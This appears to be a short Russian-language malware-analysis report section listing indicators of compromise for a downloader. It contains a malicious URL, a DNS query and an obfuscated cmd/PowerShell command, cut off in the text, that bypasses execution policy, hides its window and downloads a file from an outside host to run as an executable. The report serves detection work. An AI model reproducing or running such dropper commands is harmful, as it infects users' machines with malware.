Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^weRshE^Ll.^E^xE -E^x^ecU^tiONPoLI^cy BY^Pa^Ss -^noPRof^i^L^E^ ^-W^INdoW^StY^le hIDdEN^ ^(^NEw-^objE^ct ^S^ysT^em.nE^t.w^E^BCliEN^T).^dOW^n^L^O^a^Df^I^L^e('http://www.fapo...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "pO^weRshE^Ll.^E^xE -E^x^ecU^tiONPoLI^cy BY^Pa^Ss -^noPRof^i^L^E^ ^-W^INdoW^StY^le hIDdEN^ ^(^NEw-^objE^ct ^S^ysT^em.nE^t.w^E^BCliEN^T).^dOW^n^L^O^a^Df^I^L^e('http://www.fapo...' (со скрытым окном)